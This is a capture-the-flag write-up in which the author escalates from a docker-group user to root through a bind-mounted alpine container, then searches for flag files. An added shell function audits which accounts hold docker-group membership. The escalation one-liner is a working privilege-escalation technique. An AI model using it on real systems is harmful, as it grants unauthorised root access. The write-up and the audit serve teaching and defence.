Donnie Docker | Forensics
From the CTF description we got credentials for an SSH connection:
ssh firstname.lastname@example.org -p 5000
After a successful login with the given credentials, I saw a docker machine.
First I checked where I was (pwd command) and which groups I belonged to (id command).
uid=1000(user) gid=1000(user) groups=1000(user),999(docker)
I saw that I belong to the docker group, so I followed this lead. I assumed that if I am in this group I could probably use docker commands. From previous CTFs I knew a cool website where I found how to get a root shell with privileges to run docker:
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Running the command above resulted in a root account that gives me access to everything inside the docker container. Now I have to find the file with the flag.
find / -name '*.txt' 2>/dev/null
This command listed all files with the .txt extension, which gave me some garbage and three flag.txt files:
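The whole chain above starts from the docker group shown in the id output: an account that can talk to the Docker daemon can bind-mount / into a container. As an added example (not part of the original writeup), this shell function audits group and passwd files for non-root accounts with that membership; the function name, the sample entries and the accounts ci and alice are constructed for illustration.

```shell
#!/bin/sh
# Added example: list non-root accounts that are members of the docker group.
# docker_group_members GROUP_FILE PASSWD_FILE [GROUP_NAME]
# Prints one username per line, sorted, covering supplementary members
# (field 4 of the group entry) and accounts whose primary GID is the group.
docker_group_members() {
    group_file=$1; passwd_file=$2; group_name=${3:-docker}
    awk -F: -v g="$group_name" '
        # First file: group database. Remember the GID and listed members.
        FNR == NR {
            if ($1 == g) {
                gid = $3
                n = split($4, m, ",")
                for (i = 1; i <= n; i++) if (m[i] != "") member[m[i]] = 1
            }
            next
        }
        # Second file: passwd database. Add accounts with that primary GID.
        gid != "" && $4 == gid { member[$1] = 1 }
        $3 == 0 { is_root[$1] = 1 }   # UID 0 is already root, do not report
        END {
            for (u in member) if (!(u in is_root)) print u
        }
    ' "$group_file" "$passwd_file" | sort
}

# Constructed sample data mirroring the id output in the writeup
# (user is uid 1000, docker is gid 999); ci and alice are made up.
sample_dir=$(mktemp -d)
trap 'rm -rf "$sample_dir"' EXIT
cat > "$sample_dir/group" <<'EOF'
root:x:0:
user:x:1000:
docker:x:999:user,root
EOF
cat > "$sample_dir/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/sh
user:x:1000:1000::/home/user:/bin/sh
ci:x:1001:999::/home/ci:/bin/sh
alice:x:1002:1002::/home/alice:/bin/sh
EOF

for u in $(docker_group_members "$sample_dir/group" "$sample_dir/passwd"); do
    echo "root-equivalent via docker group: $u"
done
```

On a real host, pass /etc/group and /etc/passwd; accounts supplied by a directory service do not appear in those files and need a separate check.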
CC BY 4.0 WaletSec + HuntClauss